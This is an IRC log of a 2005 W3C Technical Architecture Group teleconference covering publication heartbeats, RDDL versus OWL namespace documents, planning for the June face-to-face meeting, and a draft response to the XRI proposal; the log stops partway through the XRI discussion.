$ nHALT=\{<M,w,n>;$ $ M$ halts on input $ w$ in less than $ n$ steps$ \}$
Is this language also undecidable in the same way that $ HALT$ is undecidable? And if so, $ nHALT\notin P$ , right?
How to proof that Turing machine that can move right only a limit number of steps is not equal to normal Turing machine
I need to prove that a Turing machine that can move only k steps on the tape after the last latter of the input word is not equal to a normal Turning machine.
My idea is that given a finite input with a finite alphabet the limited machine can write only a finite number of “outputs” on the tape while a normal Turing machine has infinite tape so it can write infinite “outputs” but I have no idea how to make it a formal proof.
any help will be appreciated.
Probabilistic Turing machine – Probability that the head has moved k steps to the right on the work tape
I have a PTM with following transition:
$ \delta(Z_0, \square , 0) = \delta(Z_0, \square , L, R)$ ,
$ \delta(Z_0, \square , 1) = \delta(Z_0, \square , R, R)$
Suppose that this PTM executes n steps. What is the probability that the head has moved k steps to the right on the work tape (in total, i.e., k is the difference between moves to the right and moves to the left) ?
4 Steps to Reach Your Goals Achieve Success FASTER Emotional Speech
4 Steps to Reach Your Goals Achieve Success FASTER Emotional Speech Set goals. Setting goals and putting them in a plan is important for achieving them, as there are some basics to follow when setting goals, including: Clearly define the goal, which is what needs to be achieved, and be measurable, in addition to its realism in order to challenge the person himself, while avoiding setting impossible goals to avoid frustration and failure, and a time limit must be set to achieve them. Setting…
4 Steps to Reach Your Goals Achieve Success FASTER Emotional Speech
Minimum steps to sort array
Consider.
Number of `m` length walks from a vertice with steps in [1, s]
The problem is stated as the following:
We are given a grid graph $ G$ of $ N \times N$ , represented by a series of strings that describe vertices s.t.
- $ L$ is the vertice we’re interested in
- $ P$ are vertices that are unavailable
- $ .$ are vertices that are available
e.g.:
.... ...L ..P. P...
Would mean a graph that looks like this
0 1 2 3 +-------------------+ 0| | | | | | | | | | +-------------------+ 1| | | | | | | | | | +-------------------+ 2| | |XXXX| | | | |XXXX| | +-------------------+ 3|XXXX| | | | |XXXX| | | | +-------------------+
Where $ v_{2,3}$ and $ v_{0,3}$ are unavailable and we’re interested in $ v_{3,1}$ .
From each vertice we’re only allowed to move on the axis (we can’t move on the diagonal) and a move is valid from $ v_{x,y}$ to $ v_{q,p}$ if
- $ |x-q| + |y-p| \leq s$ and $ v_{q,p}$ is available.
- Staying in the same spot is also a valid move
Given $ m$ – maximal number of moves and $ s$ what is the number of ways we can make $ m$ moves from vertice designated by $ L$ .
My attempt was to
- First compute the neighbors reachable from each node. Create a look s.t. $ \forall v N[v]$ is the list of reachable nodes from $ v$
- Then build a starting record $ M_0$ s.t. if node is reachable $ M[i][j] = 1$ and $ 0$ otherwise.
- Then for each step calculate for $ \forall i,j \in N$ (all the grid) $ M_{i}[i][j] = \sum_{v\in N[v]} M_{i-1}[v_i][v_j]$ (where $ v_i, v_j$ are the coordinates of $ v$ on the grid) and store in a matrix $ M_i$
We iterate until $ i==m$ .
- for each $ v_{i,j}$ : 1. for each neighbor $ n$ of $ v_{i,j}$ : 1. $ M[i][j] += M'[n_i][n_j]$
Unfortunately this doesn’t work (tried to do it with a pen and paper as well to make sure) and I get fewer results then the expected answer, apparently there should be
385 ways but I only get to
187.
Here are the intermediate states for the above mentioned board:
---------------------------- 5 6 5 5 5 7 6 6 4 6 0 5 0 5 4 5 ---------------------------- 25 34 27 27 27 41 33 34 20 33 0 27 0 27 20 25 ---------------------------- 133 187 146 149 146 229 182 187 105 182 0 146 0 146 105 133 ----------------------------
This did work for e.g. m=2 and s=1 for the following board:
0 1 2 +---+---+---+ 0| | | | | | | | +-----------+ 1| | | | | | | | +-----------+ 2| | | | | | | | +---+---+---+
Here’s my reference code (
findWalks is the main function)
using namespace std; using Cord = std::pair<size_t, size_t>; auto hash_pair = [](const Cord& c) { return std::hash<size_t>{}(c.first) ^ (std::hash<size_t>{}(c.second) << 1); }; using NeighborsMap = unordered_map<Cord, vector<Cord>, decltype(hash_pair)>; inline vector<vector<int>> initBoard(size_t n) { return vector<vector<int>>(n, vector<int>(n, 0)); } Cord findPOI(vector<string>& board) { for (size_t i=0; i < board.size(); i++) { for (size_t j=0; j < board.size(); j++) { if (board[i][j] == 'L') { return make_pair(i, j); } } } return make_pair(-1, -1); } NeighborsMap BuildNeighbors(const vector<string>& board, size_t s) { NeighborsMap neighbors(board.size() * board.size(), hash_pair); for (size_t i = 0; i < board.size(); i++) { for (size_t j = 0; j < board.size(); j++) { size_t min_i = i > s ? i - s : 0; size_t max_i = i + s > board.size() - 1 ? board.size() - 1 : i + s; size_t min_j = j > s ? j - s : 0; size_t max_j = j + s > board.size() - 1 ? board.size() - 1 : j + s; auto key = make_pair(i, j); if (board[i][j] != 'P') { for (size_t x = min_i; x <= max_i; x++) { if (board[x][j] != 'P' && x != i) { neighbors[key].push_back(make_pair(x, j)); } } for (size_t y = min_j; y <= max_j; y++) { if (board[i][y] != 'P' && y != j) { neighbors[key].push_back(make_pair(i, y)); } } neighbors[key].push_back(key); } else { neighbors[key].clear(); } } } return neighbors; } int GetNeighboursWalks(const Cord& cord, NeighborsMap& neighbors, const vector<vector<int>>& prevBoard) { int sum{ 0 }; const auto& currentNeighbors = neighbors[cord]; for (const auto& neighbor : currentNeighbors) { sum += prevBoard[neighbor.first][neighbor.second]; } return sum; } int findWalks(int m, int s, vector<string> board) { vector<vector<int>> currentBoard = initBoard(board.size()); vector<vector<int>> prevBoard = initBoard(board.size()); std::unordered_map<int, std::vector<Cord>> progress; auto poi = findPOI(board); NeighborsMap neighbors = BuildNeighbors(board, s); for (const auto& item : neighbors) { const auto& key = item.first; const auto& value = item.second; prevBoard[key.first][key.second] = value.size(); } for (size_t k = 1; k <= static_cast<size_t>(m); k++) { for (size_t i = 0; i < board.size(); i++) { for (size_t j = 0; j < board.size(); j++) { auto currentKey = make_pair(i, j); currentBoard[i][j] = board[i][j] != 'P' ? GetNeighboursWalks(currentKey, neighbors, prevBoard) : 0; } } std::swap(currentBoard, prevBoard); } return prevBoard[poi.first][poi.second]; }
CFG to CNF, but stuck on the last few steps
I recently learned about the conversion, but I seem to be stuck.
I need to convert the following CFG to CNF:
$ S → XY$
$ X → abb|aXb|e$
$ Y → c|cY$
- There is no S on the right side, so I did not need to add another
- I removed the null productions $ X → e$
$ S→XY|Y$
$ X→abb|aXb|ab|$
$ Y→c|cY|$
I removed unit production $ S→Y$ $ Y→c$ with $ S→c$
There are no production rules which have more than 2 variables
Here, I struggle. I am not allowed to have a terminal symbol and a variable together, but I am not sure how to get rid of these.
New grammar after step 4:
$ S→XY|c$
$ X→abb|aXb|ab$
$ Y→ZY$
$ Z→c$
I managed to replace the symbol c with Z, and added the new rule, so that seems fixed. However, I am unsure what do do with $ aXb$ .
Is this okay so far? if yes, what step should i take next?
Thank you in advance!
Setting different steps for Y-Axes of ListPlot
I am trying to set the scaling interval of my Y-Axes different than Mathematica automatically does. So in steps of 1000 instead of 2000 (see picture)
At the moment I determined following PlotRange:
PlotRange -> {{1, 10}, {0, 8000}}
Is there a simple option?
To get an overview over the command:
ListPlot [ MapThread[ If[Or[#1[[1]] === 3., #1[[1]] === 8.], Callout[Tooltip[#1, #2], #2], Tooltip[#1, #2]] &, Annotated2], FrameLabel -> {"Happiness Score", "Education Expenditure (per capita)"}, Frame -> True, GridLines -> Automatic, LabelStyle -> {GrayLevel[0]}, PlotRange -> {{1, 10}, {0, 8000}}] // Framed | https://proxieslive.com/tag/steps/ | CC-MAIN-2020-29 | refinedweb | 1,711 | 67.99 |
Technical Support
On-Line Manuals
CARM User's Guide
Discontinued
#include <string.h>
int strncmp (
const unsigned char *string1, /* first string */
const unsigned char *string2, /* second string */
unsigned int len); /* max characters to compare */
The strncmp function compares the first len bytes of string1 and string2 and returns a value indicating their
relationship.
The strncmp function returns the following values to
indicate the relationship of the first len bytes
of string1 to string2:
memcmp, strcmp
#include <string.h>
#include <stdio.h> /* for printf */
void tst_strncmp (void) {
unsigned char str1 [] = "Wrodanahan T.J.";
unsigned char str2 [] = "Wrodanaugh J.W.";
char i;
i = strncmp (str1, str2, 15);
if (i < 0)
printf ("str1 < str2\n");
else if (i > 0)
printf ("str1 > str2\n");
else
printf ("str1 == str. | http://www.keil.com/support/man/docs/ca/ca_strncmp.htm | CC-MAIN-2020-16 | refinedweb | 124 | 71.75 |
I created this script to help with some geodatabase house cleaning tasks. Maybe someone else will find it useful or have an idea to improve it.
import arcpy import os # Set workspace myGDB = r"C:\temp\working.gdb" # Get domains that are assigned to a field domains_used = [] for dirpath, dirnames, filenames in arcpy.da.Walk(myGDB, datatype=["FeatureClass", "Table"]): for filename in filenames: print "Checking {}".format(os.path.join(dirpath, filename)) try: ## Check for normal field domains for field in arcpy.ListFields(os.path.join(dirpath, filename)): if field.domain: domains_used.append(field.domain) ## Check for domains used in a subtype field subtypes = arcpy.da.ListSubtypes(os.path.join(dirpath, filename)) for stcode, stdict in subtypes.iteritems(): if stdict["SubtypeField"] != u'': for field, fieldvals in stdict["FieldValues"].iteritems(): if not fieldvals[1] is None: domains_used.append(fieldvals[1].name) except Exception, err: print "Error:", err # Get domains that exist in the geodatabase domains_existing = [dom.name for dom in arcpy.da.ListDomains(myGDB)] # Find existing domains that are not assigned to a field domains_unused = set(domains_existing) ^ set(domains_used) print "{} unused domains in {}".format(len(domains_unused), myGDB) for domain in domains_unused: arcpy.DeleteDomain_management(myGDB, domain) print "{} deleted".format(domain)
Hi Blake,
Thanks for the great script. A colleague recommended it to perform some long awaited maintenance on our SDE instances and this will be very handy.
While running it, however, the script through the following exception:
Is there a way to execute this code when the connection being used isn't the owner? Perhaps a way to skip over the domains that don't belong to the current owner.
Thanks again,
Ruch | https://community.esri.com/thread/160265?commentID=543911 | CC-MAIN-2019-09 | refinedweb | 270 | 52.87 |
The QPen class defines how a QPainter should draw lines and outlines of shapes. More...
#include <QPen>
The QPen class defines how a QPainter should draw lines and outlines of shapes.
A pen has a style, width, brush, cap style and join style.
The pen style defines the line type. The default pen style is Qt::SolidLine. Setting the style to Qt::NoPen tells the painter to not draw lines or outlines.
The pen brush defines the fill of lines and text. The default pen is a solid black brush. The QColor documentation lists predefined colors.
The cap style defines how the end points of lines are drawn. The join style defines how the joins between two lines are drawn when multiple connected lines are drawn (QPainter::drawPolyline() etc.). The cap and join styles only apply to wide lines, i.e. when the width is 1 or greater.
Use the QBrush class to specify fill styles.
Example:
QPainter painter; QPen pen(Qt::red, 2); // red solid line, 2 pixels wide painter.begin(&anyPaintDevice); // paint something painter.setPen(pen); // set the red, wide pen painter.drawRect(40,30, 200,100); // draw a rectangle painter.setPen(Qt::blue); // set blue pen, 0 pixel width painter.drawLine(40,30, 240,130); // draw a diagonal in rectangle painter.end(); // painting done
See the Qt::PenStyle enum type for a complete list of pen styles.
Whether or not end points are drawn when the pen width is zero or one depends on the cap style. Using SquareCap (the default) or RoundCap they are drawn, using FlatCap they are not drawn.
A pen's color(), brush(), width(), style(), capStyle() and joinStyle() can be set in the constructor or later with setColor(), setWidth(), setStyle(), setCapStyle() and setJoinStyle(). Pens may also be compared and streamed.
See also QPainter and QPainter::setPen().
Constructs a default black solid line pen with 0 width.
Constructs a black pen with 0 width and style style.
See also setStyle().
Constructs a pen of color color with 0 width.
See also setBrush() and setColor().
Constructs a pen with the specified brush brush and width width. The pen style is set to s, the pen cap style to c and the pen join style to j.
See also setWidth(), setStyle(), and setBrush().
Constructs a pen that is a copy of p.
Destroys the pen.
Returns the brush used to fill strokes generated with this pen.
See also setBrush().
Returns the pen's cap style.
See also setCapStyle().
Returns the pen color.
See also setColor().
Returns true if the pen has a solid fill
Returns the pen's join style.
See also setJoinStyle().
Sets the brush used to fill strokes generated with this pen to the given brush.
See also brush().
Sets the pen's cap style to c.
The default value is Qt::SquareCap.
See also capStyle().
Sets the pen color to c.
See also color().
Sets the pen's join style to j.
The default value is Qt::BevelJoin.
See also joinStyle().
Sets the pen style to s.
See the Qt::PenStyle documentation for a list of all the styles.
See also style().
Sets the pen width to width
A line width of zero indicates cosmetic pen. This means that the pen width is always drawn one pixel wide, independent of the transformation set on the painter.
Setting a pen width with a negative value is not supported.
See also setWidthF() and width().
Sets the pen width to width.
See also setWidth() and widthF().
Returns the pen style.
See also setStyle().
Returns the pen width with integer preceision.
See also setWidth().
Returns the pen width with floating point precision.
See also setWidthF() and width().
Returns the pen as a QVariant
Returns true if the pen is different from p; otherwise returns false.
Two pens are different if they have different styles, widths or colors.
See also operator==().
Assigns p to this pen and returns a reference to this pen.
Returns true if the pen is equal to p; otherwise returns false.
Two pens are equal if they have equal styles, widths and colors.
See also operator!=().
This is an overloaded member function, provided for convenience. It behaves essentially like the above function.
Reads a pen from the stream s into p and returns a reference to the stream.
See also Format of the QDataStream operators. | http://doc.trolltech.com/4.0/qpen.html | crawl-001 | refinedweb | 721 | 79.67 |
IRC log of tagmem on 2005-04-26
Timestamps are in UTC.
16:59:15 [RRSAgent]
RRSAgent has joined #tagmem
16:59:15 [RRSAgent]
logging to
16:59:21 [noah]
noah has joined #tagmem
16:59:52 [noah]
zakim, who is here?
16:59:52 [Zakim]
On the phone I see TimBL, ??P11
16:59:55 [Zakim]
On IRC I see noah, RRSAgent, Ed, Zakim, Vincent, Norm, ht, DanC
17:00:22 [Zakim]
+[IBMCambridge]
17:00:29 [noah]
zakim, [IBMCambridge] is me
17:00:29 [Zakim]
+noah; got it
17:00:34 [Zakim]
+[INRIA]
17:00:52 [Zakim]
+norm
17:01:09 [Vincent]
Zakim, INRIA is Vincent
17:01:09 [Zakim]
+Vincent; got it
17:01:30 [noah]
Topic: Tag teleconference of 26-April-2005
17:01:35 [noah]
scribe: Noah Mendelsohn
17:01:39 [noah]
scribenick: noah
17:01:49 [Zakim]
+Roy_Fielding
17:01:54 [noah]
Meeting: Tag teleconference of 26-April-2005
17:02:08 [Vincent]
Zakim, who is here
17:02:08 [Zakim]
Vincent, you need to end that query with '?'
17:02:18 [Vincent]
Zakim, who is here?
17:02:18 [Zakim]
On the phone I see TimBL, ??P11, noah, Vincent, norm, Roy_Fielding
17:02:19 [Roy]
Roy has joined #tagmem
17:02:19 [Zakim]
On IRC I see noah, RRSAgent, Ed, Zakim, Vincent, Norm, ht, DanC
17:02:29 [noah]
Chair: Vincent Quint
17:03:08 [noah]
Agenda:
17:04:11 [Zakim]
-Roy_Fielding
17:04:43 [Zakim]
+Roy_Fielding
17:05:03 [noah]
Topic: Attendance
17:05:08 [timbl]
timbl has joined #tagmem
17:05:43 [noah]
Regrets: David Orchard, Dan Connolly (seems to be on IRC)
17:05:49 [noah]
Missing for now: Henry Thompson
17:06:12 [ht]
zakim, please call ht-781
17:06:12 [Zakim]
ok, ht; the call is being made
17:06:14 [Zakim]
+Ht
17:06:37 [noah]
Present: Roy Fielding, Vincent Quint, Tim Berners-Lee, Noah Mendelsohn, Norm Walsh, Ed Rice
17:06:42 [noah]
Topic: Future Regrets
17:06:56 [noah]
May 10th: Norm and Tim will be unavailable
17:07:01 [noah]
May 17th: Tim at risk
17:07:21 [noah]
May 3rd: no regrets for now
17:07:24 [timbl]
I note May 10th is the WWW conference in Chiba Japan
17:07:42 [noah]
s/Future Regrets/Future Meetings/
17:08:06 [noah]
For next week, scribes will be: David Orchard if available, otherwise Norm Walsh
17:08:15 [noah]
Topic: Approval of previous minutes
17:08:44 [noah]
Review of:
17:08:54 [noah]
Norm: haven't reviewed but no problem if others agree.
17:09:21 [noah]
RESOLUTION: Minutes of April 19th accepted (
)
17:09:33 [noah]
Henry reports that he has been on phone for past 5 minutes
17:09:55 [noah]
Topic: TAG Publications and "Heartbeats"
17:10:35 [noah]
Norm sent a note (member only) on errata:
17:10:39 [noah]
VQ: do we have errata?
17:10:56 [noah]
NW: yes, 3 or 4 reported to comments list, all editorial
17:11:17 [noah]
ACTION: Norm to gather errata list for consideration next week.
17:12:12 [noah]
NW: RDDL to do may be mine. It had history with Tim Bray, then Paul Cotton, both now gone.
17:12:31 [noah]
NW: I've somewhat lost track of where it stands, but I'll take the lead if we figure out what we want to do.
17:13:07 [noah]
NW: The AC asked the TAG to produce a rec-track document, presumably based on RDDL.
17:13:12 [noah]
VQ: Do we have a draft?
17:13:13 [noah]
NW: No.
17:13:48 [noah]
NW: I'm willing to produce if asked to do so, either based on RDDL 1.0 or something else. What do we want to do.
17:13:49 [ht]
Would prefer 1.0
17:13:57 [noah]
s/do./do?/
17:14:36 [noah]
NW: ht has pointed out use of RDDL 1.0 in some W3C specs. Microsoft is also deploying?
17:14:51 [noah]
TBL: Are you saying TAG should produce a Rec?
17:14:56 [noah]
NW: AC asked us to.
17:15:23 [noah]
TBL: GRDDL affects this, no?
17:15:32 [noah]
HT: Solves a different problem.
17:15:36 [noah]
TBL: Why?
17:16:08 [noah]
HT: RDDL solves, what should you do specifically with namespaces. GRDDL is about: "I've got a doc that serves two purposes (1) to be an XML document and (2) how to harvest metadata"
17:16:38 [noah]
TBL: GRDDL allows you to extract (RDF?) information from something that is not in RDF form.
17:17:05 [noah]
NW: One of the objections to earlier Namespace formats was that they were not in RDF and should have been. GRDDL takes the heat off of that.
17:17:17 [noah]
HT: Some of the problems we're solving don't need all the RDF mechanism.
17:17:30 [noah]
TBL: Yes, but for the many namespaces built for RDF it makes great sense.
17:17:50 [noah]
TBL: For a semantic web language, then OWL should be the language of the namespace document.
17:18:04 [noah]
HT: Historically, we decided early that there was no single thing you wanted to say about a namespace.
17:18:23 [noah]
HT: Among the many such things is what the RDF schema is, what the XML Schema is for the serialization.
17:19:04 [noah]
TBL: I understand. I think you need to divide the cases. XML Schema makes no sense for RDF vocabularies.
17:19:40 [noah]
HT: But with GRDDL it does make sense. It gives me license to author in colloquial XML a document that is known to contain RDF statements.
17:19:49 [noah]
HT: For such a document, all of that makes sense.
17:20:04 [Norm]
Norm has joined #tagmem
17:20:13 [noah]
TBL: That makes sense, except that when I extract the RDF information I would not expect the extracted doc to be in the same namespace.
17:20:14 [Norm]
zakim, mute me
17:20:14 [Zakim]
norm should now be muted
17:20:17 [noah]
HT: OK, makes sense.
17:20:45 [Norm]
zakim, who's here?
17:20:45 [Zakim]
On the phone I see TimBL, ??P11, noah, Vincent, norm (muted), Roy_Fielding, Ht
17:20:47 [Zakim]
On IRC I see Norm, timbl, Roy, noah, RRSAgent, Ed, Zakim, Vincent, ht, DanC
17:20:57 [noah]
HT: Still, my point is that the original RDDL was based on the presumption was that there would be more than one document of interest, and that it would contain pointers to one or more things as necessary.
17:21:13 [noah]
TBL: Well, only if we say that this is only for non-semantic web namespaces.
17:21:33 [Norm]
zakim, unmute me
17:21:33 [Zakim]
norm should no longer be muted
17:21:44 [noah]
HT: I'm less convinced than you that the differences matter, but I can easily live with a statement that at least for now, the RDDL approach is aimed at non-semantic web namespaces.
17:21:52 [Norm]
zakim, who's talking?
17:21:55 [Roy]
Roy has joined #tagmem
17:21:59 [noah]
HT: Information please: does OWL say use it as a namespaces doc?
17:22:03 [Zakim]
Norm, listening for 10 seconds I heard sound from the following: TimBL (71%), ??P11 (43%), Vincent (19%)
17:22:21 [timbl]
q?
17:22:26 [Roy]
q+
17:22:27 [noah]
TBL: No, but the TAG did some sort of best practices note (can't fine right now) says do that, and I think it's common practice.
17:23:01 [noah]
HT: OK, so finding might say: if (isSementicWeb) then {use owl} else {use RDDL}
17:23:27 [noah]
NW: I'm not convinced that using RDDL for all is bad, with the RDDL pointing to the OWL. I want human readable documentation, etc.
17:23:47 [noah]
NW: I'm thinking of Ed Dumbill's work on software project descriptions. It's both RDF and not.
17:23:59 [ht]
DOAP
17:24:03 [noah]
NW: I don't totally disagree with Tim, but I'm not totally convinced either.
17:24:10 [noah]
TBL: what's he really done?
17:24:12 [Roy]
pointer to RDDL in minutes?
17:24:17 [ht]
17:24:31 [noah]
NW: A constrained RDF that's usable as XML.
17:24:32 [ht]
17:24:38 [noah]
TBL: right, that's the tricky case
17:25:40 [noah]
TBL: specifically because there's an issue of whether the fragid identifies the concept or the markup
17:25:50 [noah]
HT: argh, not httpRange-14!
17:26:17 [noah]
NRM: No, smaller than httpRange-14. We need to ask what's the media type in this case, and what answer is given to Tim's question about fragids.
17:26:19 [Roy]
17:26:21 [Vincent]
ack Roy
17:27:14 [ht]
q+ ht
17:27:20 [noah]
RF: We've been around this before. Key question is: what's the requirement for the document? I think we had consensus on one thing, which is that the key requirement is that it be human readable.
17:27:28 [Norm]
Roy is right, we did come to consensus on that point
17:27:33 [noah]
TBL: I'm not sure we said that. For some cases, machine readiable is important.
17:27:42 [noah]
s/readiable/readable/
17:28:07 [timbl]
I don't think we had a consensus that human readable was primary. Tim Bray said so strongly. I am prepared to defend strongly the semantic web use of OWL and RDF in general.
17:28:18 [noah]
RF: I mostly don't want to go around same ground again. Ideally, it's useful for human purposes and machine readable as necessary.
17:29:25 [noah]
TBL: We have a current suite of specs that tell a semantic web agent how to go out and find semantic web information. This would require a new spec and engineering into future software. Is this a good thing to require for agents?
17:29:35 [Vincent]
ack ht
17:29:38 [noah]
TBL: In fact, you can use a stylesheet to make an owl doc human readable
17:29:50 [noah]
HT: We did this for W3C XML schema
17:30:07 [Norm]
If the cost of the redirect is too expensive, then the cost of the retreival is probably too expensive too.
17:30:19 [noah]
HT: The rec was written to allow you to implement indirection through things like namespace documents. Most implementations do the right thing when a RDDL doc comes back.
17:30:45 [noah]
HT: This is a relevant precedent. It was easy and lightweight. About 10 lines of code in the validators I built.
17:31:11 [noah]
TBL: Most of this software has no XML processing software, except for limited purposes.
17:31:23 [noah]
RF: They're not extensible for new media types.
17:31:34 [Roy]
s/./?/
17:31:36 [noah]
TBL: There's no XML schema processing in the RDF processors.
17:32:17 [Roy]
q?
17:32:23 [noah]
HT: You've misunderstood. I'm only drawing a parallel. I'm pointing out that the fact that it was easy to add to XML schema processors suggests it will be equally easy to add such indirection to RDF processors.
17:33:08 [noah]
TBL: Adding something simple to an existing system to something that's currently simple and complete results in a kind of complication.
17:34:07 [noah]
q+ to ask how sem. web namespaces are the same and different from others
17:34:58 [noah]
TBL: e.g., using different DTD syntax for XML complicated everything
17:35:45 [noah]
TBL: Even using the XML stuff for RDF was a complication, but it would be good to hold the line there. OWL is in RDF, so we can get into that world quite quickly and cleanly.
17:35:56 [Norm]
Norm has joined #tagmem
17:36:12 [Vincent]
ack noah
17:36:12 [Zakim]
noah, you wanted to ask how sem. web namespaces are the same and different from others
17:36:12 [Roy]
q+ to ask if there are any examples of such an OWL namespace description to look at
17:39:03 [Norm]
q?
17:39:29 [Vincent]
ack Roy
17:39:29 [Zakim]
Roy, you wanted to ask if there are any examples of such an OWL namespace description to look at
17:39:35 [ht]
I always thought it was the XSL WG's requirement that produced Namespaces. . .
17:40:07 [noah]
NRM: Tim tells us that sem. web. is a clean closed consistent world, but some of the complication comes from the fact that it shares a namespace mechanism with a wider XML world.
17:40:18 [ht]
DanC, are you happy with the XRI response?
17:40:25 [Norm]
17:40:26 [Norm]
17:40:40 [noah]
NRM: This allows a nice "pun", in which the serialization of an RDF namespace is the corresponding (same) XML namespace. We also can reference XML datatypes.
17:40:57 [DanC]
I think so, ht. the one I reviewed and commented on was pretty close, and I assume the subsequent edits remain in that neighborhood
17:41:35 [noah]
NRM: This will pop up on one side or the other: if we want the sem web side to be clean and consistent, then the story about namespaces as a whole gets more complicated. If we have a uniform story about all namespaces (e.g. RDDL), then the sem. web side gets a bit more complicated. Take your choice.
17:41:53 [noah]
NW: Well, if we need a special case for something like semantic web, I'm not sure it's worth doing at all.
17:41:53 [timbl]
I have :)
17:42:01 [timbl]
(taken my choice)
17:42:31 [noah]
VQ: Time's about up. I had hoped we could decide about publishing something based on RDDL? Looks like 'no'.
17:42:49 [noah]
VQ: Let me ask the original question again: is there anything we could publish as a heartbeat from the WG?
17:42:56 [noah]
TBL: Note or working draft?
17:43:11 [noah]
VQ: Working draft would make requirement heartbeat. Do you have any in mind, Tim?
17:43:20 [Zakim]
+DanC
17:43:20 [noah]
TBL: No. Norm said he would write something.
17:43:31 [noah]
Dan appears to have joined the call.
17:44:02 [noah]
NW: I'm reluctant to write draft without consensus on what high level approach to attempt.
17:44:42 [ht]
q+ to say _if_ we are happy with RDDL 1.0, _then_ we can do a NOTE real quick
17:44:55 [Vincent]
ack DanC
17:44:55 [noah]
TBL: We're being lured into grabbing an answer that's lying around. This sounds like a job that's more suited to a WG that would focus on it more seriously. When we started this, RDDL looked pretty well baked.
17:45:45 [noah]
DC: We have to publish something or close the group, or get permission from the director to continue anyway. We don't have to decide what it is today.
17:46:30 [noah]
VQ: My understanding is RDDL is not ready for pub soon, and I'm asking if we have anything else to publish.
17:46:58 [noah]
TBL: What about asking Norm to write a finding discussing the RDDL/OWL questions in relation to namespaces.
17:47:12 [noah]
s/namespaces./namespaces?/
17:47:28 [DanC]
(pls let the record show we're discussing issue namespaceDocument-8, not just the heartbeat publishing requirement)
17:47:37 [noah]
NW: I could pull together a short finding talking about earlier RDDL work, and today's discussion.
17:47:42 [noah]
TBL: Would OWL be in there?
17:47:58 [noah]
NW: Yes, if it belongs at all. I know where I'd like it to come out, but this finding is where it all belongs.
17:48:07 [noah]
NW: Will try to do something this week.
17:48:09 [ht]
q- ht
17:48:15 [ht]
q+ ht
17:48:53 [noah]
DC: You're going to hit all kinds of fun stuff, such as the fact that rddl.org is a non-w3c basis for a namespace name.
17:49:49 [noah]
VQ: what's on the agenda was dan's proposal to publish something based on RDDL.
17:49:55 [noah]
DC: that was an aside.
17:50:57 [noah]
HT: I could possibly move along the finding on issue 50, which would give us something to publish.
17:51:07 [DanC]
(what HT is drafting on issue 50... doing that as a /TR/ publication would be different from the way we've done findings in the past, but not a bad idea)
17:51:25 [noah]
VQ: That would give us a first WD
17:51:37 [noah]
HT: Right, that's what I meant.
17:51:49 [noah]
HT: Do findings count as tech reports.
17:52:02 [noah]
s/tech reports/heartbeats/
17:52:06 [noah]
DC: No
17:52:17 [noah]
HT: We need discussion on that meta topic.
17:52:46 [noah]
HT: We are not working primarily in a Rec mode, and should not do backflips to fit into a process not tuned to our needs.
17:52:55 [noah]
VQ: Yes, we should discuss that.
17:52:59 [timbl]
TBL: I agree with HT
17:53:03 [DanC]
(I don't mind changing the rules. My job as team contact is to enforce them or change them. I'm happy to do either.)
17:53:18 [noah]
NRM: At next meeting?
17:53:21 [noah]
VQ: yes.
17:53:57 [noah]
VQ: Henry, can you make progress in issue 50 anyway?
17:54:03 [noah]
HT: Yes, I intend to try.
17:54:20 [noah]
Topic: Planning next F2F meeting in Boston
17:54:59 [noah]
VQ: We started some discussion about what we should do as next technical document, that we should prepare in advance, but should do that mainly face to face.
17:54:59 [Roy]
q+ to suggest we have a F2F goal for a REC track webarch volume 2 that contains only an outline
17:55:04 [noah]
This is a reminder to start that discussion.
17:55:13 [noah]
s/This/VQ: This/
17:55:24 [noah]
VQ: Ed, was there something else you wanted to ask?
17:55:42 [noah]
ED: Partly travel plans, partly wanting to focus on issues.
17:56:44 [noah]
VQ; Meeting will start morning of June 14. Some of us will leave early- to mid-afternoon of 3rd day.
17:57:03 [noah]
VQ: Please send travel plans to tag mailing list.
17:57:31 [noah]
q+ to suggest main focus should be on trying to identify what our big themes will be for next year+
17:57:49 [Roy]
9am
17:58:25 [noah]
VQ: Start time 8AM, Tues, June 14.
17:58:45 [noah]
HT: I'd prefer we go as late as possible on the 3rd day.
17:58:51 [noah]
No conflicts reported.
17:59:04 [noah]
VQ: Since there are no conflicts, we'll go a full day on the 3rd day.
17:59:11 [DanC]
(not sure that was really 8am and not 9am, but probably doesn't matter)
17:59:24 [noah]
(right, we can fine tune later.)
17:59:58 [ndw_]
ndw_ has joined #tagmem
18:01:07 [ht]
q- ht
18:01:19 [Roy]
ack Roy
18:01:19 [Zakim]
Roy, you wanted to suggest we have a F2F goal for a REC track webarch volume 2 that contains only an outline
18:01:21 [ndw]
ack roy
18:01:31 [Vincent]
q?
18:01:41 [noah]
NRM: I think prioirty and as much time as necessary should be given to figuring out what our big themes are for the coming year or two. Issues should be discussed, but only time permitting.
18:02:07 [noah]
RF: We could try to publish an outline for Web Arch 2. That would take most of 3 days.
18:02:08 [Vincent]
ack noah
18:02:08 [Zakim]
noah, you wanted to suggest main focus should be on trying to identify what our big themes will be for next year+
18:02:14 [DanC]
(yes, let's work on an outline; dunno if I want to publish it)
18:02:19 [Vincent]
ack danc
18:02:19 [Zakim]
DanC, you wanted to ask about xquery namespace study, and timing
18:03:25 [ndw]
DanC, please send those as LC comments!
18:03:37 [noah]
DC: I spent a lot of time working bottom up on the functions and operators stuff.
18:04:41 [noah]
DC: I think I'm suggesting the group spend some time working through those particular details.
18:05:34 [noah]
VQ: Let's wrap up the agenda discussion. I think it will be useful to have a draft agenda early. I will aim for one month in advance, which is mid May.
18:06:08 [noah]
ACTION: Vincent to prepare by mid-May a draft agenda for the June face to face meeting
18:06:09 [ndw]
We've hit my hot list for the f2f: outline WebArch V2, httpRange-14, and the issues DanC mentioned
18:06:18 [noah]
Topic: Feedback on XRI proposal
18:07:37 [noah]
ED: We've had some discussion on tag@w3.org. What's the right order for putting something on www-tag and/or sending to Oasis?
18:07:46 [timbl]
18:08:11 [noah]
s/
18:08:53 [noah]
18:09:31 [noah]
Discussing Henry's (member only) draft at:
18:09:52 [noah]
DC: we need better links to XRI docs.
18:10:07 [noah]
DC: Actually, this is close enough.
18:11:40 [noah]
TBL: This is good, but somewhat underrepresents level of detail of our analysis. Much better than nothing.
18:11:51 [noah]
HT: Should we point to the httpDNS thread in the public mailing list?
18:12:05 [DanC]
->
for names consisting of an adiminstrative hierarchy and a path, HTTP/DNS is as good as it gets
18:12:19 [noah]
HT: I feel we should reproduce the tag@w3.org discussion on www-tag@w3.org
18:12:24 [noah]
q?
18:13:09 [noah]
q+ to say that summary correctly mentions http scheme as well as protocols, but main body opens with "we also believe that
18:13:09 [noah]
this can be provided with existing HTTP and DNS protocols"
